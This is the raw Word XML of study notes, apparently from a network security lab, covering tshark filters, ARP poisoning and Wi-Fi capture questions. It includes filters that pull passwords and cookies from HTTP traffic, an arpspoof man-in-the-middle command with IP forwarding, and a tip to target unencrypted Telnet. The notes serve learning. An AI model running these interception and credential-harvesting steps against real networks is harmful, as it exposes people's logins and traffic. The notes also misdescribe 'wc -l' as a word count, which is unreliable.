          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Search filter should auto-adjust.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7700EB08" w14:textId="77777777" w:rsidR="005A2F53" w:rsidRDefault="005A2F53" w:rsidP="005A2F53">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50046D92" w14:textId="6FDD9B7E" w:rsidR="005A2F53" w:rsidRDefault="005A2F53" w:rsidP="005A2F53">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00CE7DCC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>hark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46755A53" w14:textId="12FC2C1F" w:rsidR="00CE7DCC" w:rsidRDefault="00CE7DCC" w:rsidP="00CE7DCC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Command-line version of Wireshark.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F116506" w14:textId="4172FEC3" w:rsidR="00CE7DCC" w:rsidRDefault="007152EB" w:rsidP="00CE7DCC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“tshark -v” – Current version of tshark, could also use “-h” for help menu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8BDB13" w14:textId="09C1178F" w:rsidR="006F2630" w:rsidRDefault="006F2630" w:rsidP="006F2630">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E79D9EC" w14:textId="4AAEEBD6" w:rsidR="000D1B35" w:rsidRPr="000D1B35" w:rsidRDefault="00E63DCE" w:rsidP="000D1B35">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">“tshark -r (PCAP FILE)” </w:t>
      </w:r>
      <w:r w:rsidR="00D20F41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D20F41">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Display contents of a packet capture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C24E534" w14:textId="1B1D8E39" w:rsidR="000D1B35" w:rsidRDefault="000D1B35" w:rsidP="000D1B35">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“| wc -l” – word count for file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6413CA" w14:textId="44758BB6" w:rsidR="009D194F" w:rsidRDefault="009D194F" w:rsidP="009D194F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“tshark -r (PCAP FILE) -z io,phs</w:t>
      </w:r>
      <w:r w:rsidR="00E84ACE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> -q”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21903296" w14:textId="78DE7904" w:rsidR="002D391C" w:rsidRDefault="002D391C" w:rsidP="002D391C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Protocol hierarchy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FF4711" w14:textId="1A1E3C48" w:rsidR="002D391C" w:rsidRDefault="00EC7B44" w:rsidP="002D391C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“tshark -r (PCAP FILE) -Y ‘http’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4395BDFA" w14:textId="071DAC76" w:rsidR="001D6237" w:rsidRDefault="001D6237" w:rsidP="002D391C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“tshark -r (PCAP FILE) -Y ‘ip.src</w:t>
      </w:r>
      <w:r w:rsidR="00753F5A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>==(SOURCE IP) &amp;&amp; ip.dst==(DEST IP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72786D4A" w14:textId="123B2C9D" w:rsidR="00A263ED" w:rsidRDefault="00776E28" w:rsidP="002D391C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“tshark -r (PCAP FILE) -Y ‘http.request.method==GET’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480E856C" w14:textId="11B3BBC4" w:rsidR="00172105" w:rsidRDefault="0014046B" w:rsidP="00172105">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00172105">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>-Tfields -e frame.time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e ip.src -e http.request.full_uri’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567BA889" w14:textId="78F33BDB" w:rsidR="0014046B" w:rsidRDefault="00D47CB0" w:rsidP="0014046B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">“tshark -r </w:t>
      </w:r>
      <w:r w:rsidR="00592AAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>(PCAP) -Y ‘http contains password’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBA99C7" w14:textId="77777777" w:rsidR="00425D6C" w:rsidRDefault="005206A8" w:rsidP="0014046B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“tshark -r (PCAP FILE)</w:t>
      </w:r>
      <w:r w:rsidR="00C8027C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Y ‘http.request.method==GET &amp;&amp; http.host==www.nytimes.com’ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573D8080" w14:textId="385D92B0" w:rsidR="00592AAD" w:rsidRDefault="00425D6C" w:rsidP="00425D6C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00C8027C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>-Tfields -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>e ip.dst</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17588F12" w14:textId="22920A82" w:rsidR="007D3F29" w:rsidRDefault="007D3F29" w:rsidP="007D3F29">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“tshark -r (PCAP FILE) -Y ‘</w:t>
      </w:r>
      <w:r w:rsidR="00B017B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ip contains amazon.</w:t>
      </w:r>
      <w:r w:rsidR="003047A6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>in &amp;&amp; ip.src==(SOURCE IP)’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAEE1E7" w14:textId="5EA1F084" w:rsidR="003047A6" w:rsidRDefault="003047A6" w:rsidP="003047A6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>‘-Tfields -e ip.src -e http.cookie’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03239C8A" w14:textId="025554C8" w:rsidR="002424B0" w:rsidRDefault="002424B0" w:rsidP="002424B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“tshark -r (PCAP FILE) -Y ‘</w:t>
      </w:r>
      <w:r w:rsidR="00F04623">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ip.src==(SOURCE IP)&amp;&amp; http’ -Tfields -e http.user_agent</w:t>
      </w:r>
      <w:r w:rsidR="00B52508">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC24495" w14:textId="05BC4BF6" w:rsidR="003047A6" w:rsidRDefault="003047A6" w:rsidP="003047A6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>These are just some examples</w:t>
      </w:r>
      <w:r w:rsidR="008B4F8C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5574DAD8" w14:textId="77777777" w:rsidR="00760754" w:rsidRDefault="00760754" w:rsidP="00760754">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48DF093C" w14:textId="0702D8C3" w:rsidR="00760754" w:rsidRDefault="00760754" w:rsidP="00760754">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ARP Poisoning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEB0C65" w14:textId="649389D4" w:rsidR="000966DB" w:rsidRDefault="000966DB" w:rsidP="000966DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Man-in-the-middle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357672DC" w14:textId="49C3D353" w:rsidR="000966DB" w:rsidRDefault="000966DB" w:rsidP="000966DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>“echo 1&gt; /proc/sys/net/ipv4/ip_forward”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D876D3F" w14:textId="638E507A" w:rsidR="00B471C3" w:rsidRDefault="00B471C3" w:rsidP="000966DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">“arpspoof -i eth1 -t </w:t>
      </w:r>
      <w:r w:rsidR="0037032B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>10.100.13.37 -r 10.100.13.36”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F348C1B" w14:textId="016BC177" w:rsidR="00070DE0" w:rsidRDefault="00070DE0" w:rsidP="007601FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Look out for potential packets that are using services that are open for the machine, this is </w:t>
      </w:r>
      <w:r w:rsidR="00CB5728">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>something we could potentially poison.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D45A6F2" w14:textId="119F456E" w:rsidR="007601FE" w:rsidRDefault="007601FE" w:rsidP="007601FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Telnet is a good service to use ARP poisoning against, as the data is not encrypted during transmission meaning you could potentially view it within the HTTP streams in Wireshark.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3365E67A" w14:textId="77777777" w:rsidR="000B0946" w:rsidRDefault="000B0946" w:rsidP="000B0946">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="724F4E41" w14:textId="77777777" w:rsidR="000B0946" w:rsidRDefault="000B0946" w:rsidP="000B0946">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50C19166" w14:textId="77777777" w:rsidR="000B0946" w:rsidRDefault="000B0946" w:rsidP="000B0946">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F140608" w14:textId="24673D97" w:rsidR="000B0946" w:rsidRDefault="000B0946" w:rsidP="000B0946">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Wi-Fi Traffic Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A12BC35" w14:textId="132F2F00" w:rsidR="009A4D0A" w:rsidRDefault="009A4D0A" w:rsidP="000B0946">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The following are some search filters to answer some Wi-Fi questions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D07F33" w14:textId="35AA1FC2" w:rsidR="009A4D0A" w:rsidRDefault="009A4D0A" w:rsidP="009A4D0A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>What is the name of the Open (No Security) SSID present in the packet dump?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C30665D" w14:textId="41AB969A" w:rsidR="009A4D0A" w:rsidRDefault="0037217A" w:rsidP="0037217A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>(wlan.fc.type_subtype==</w:t>
      </w:r>
      <w:r w:rsidR="00CB04F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>0x0008) &amp;&amp; !(wlan.wfa.ie.wpa.version == 1) &amp;&amp; !(wlan.tag.number==48)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C12FC65" w14:textId="173F74E7" w:rsidR="008445ED" w:rsidRDefault="00B10E09" w:rsidP="008445ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B10E09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The SSID 'Home_Network' is operating on which channel?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658C8114" w14:textId="5A14C738" w:rsidR="00412D58" w:rsidRDefault="00412D58" w:rsidP="00412D58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“wlan contains Home_Network”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289D0049" w14:textId="3332E953" w:rsidR="00B10E09" w:rsidRDefault="00D66C79" w:rsidP="008445ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D66C79">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Which security mechanism is configured for SSID 'LazyArtists'? Your options are: OPEN, WPA-PSK, WPA2-PSK.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114FB12E" w14:textId="18018431" w:rsidR="000E33B5" w:rsidRDefault="000E33B5" w:rsidP="000E33B5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“wlan contains LazyArtists”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60976217" w14:textId="090E9FE5" w:rsidR="000E33B5" w:rsidRDefault="000E33B5" w:rsidP="000E33B5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Try to find the RSN in one of the tags.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518A36B9" w14:textId="19051B90" w:rsidR="00D66C79" w:rsidRDefault="00D66C79" w:rsidP="008445ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D66C79">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Is WiFi Protected Setup (WPS) enabled on SSID 'Amazon Wood'? State Yes or No.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3616B743" w14:textId="04E4ED87" w:rsidR="00B11D3C" w:rsidRDefault="00B11D3C" w:rsidP="00B11D3C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B11D3C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>(wlan.ssid contains Amazon) &amp;&amp; (wlan.fc.type_subtype == 0x0008)</w:t>
      </w:r>
    </w:p>
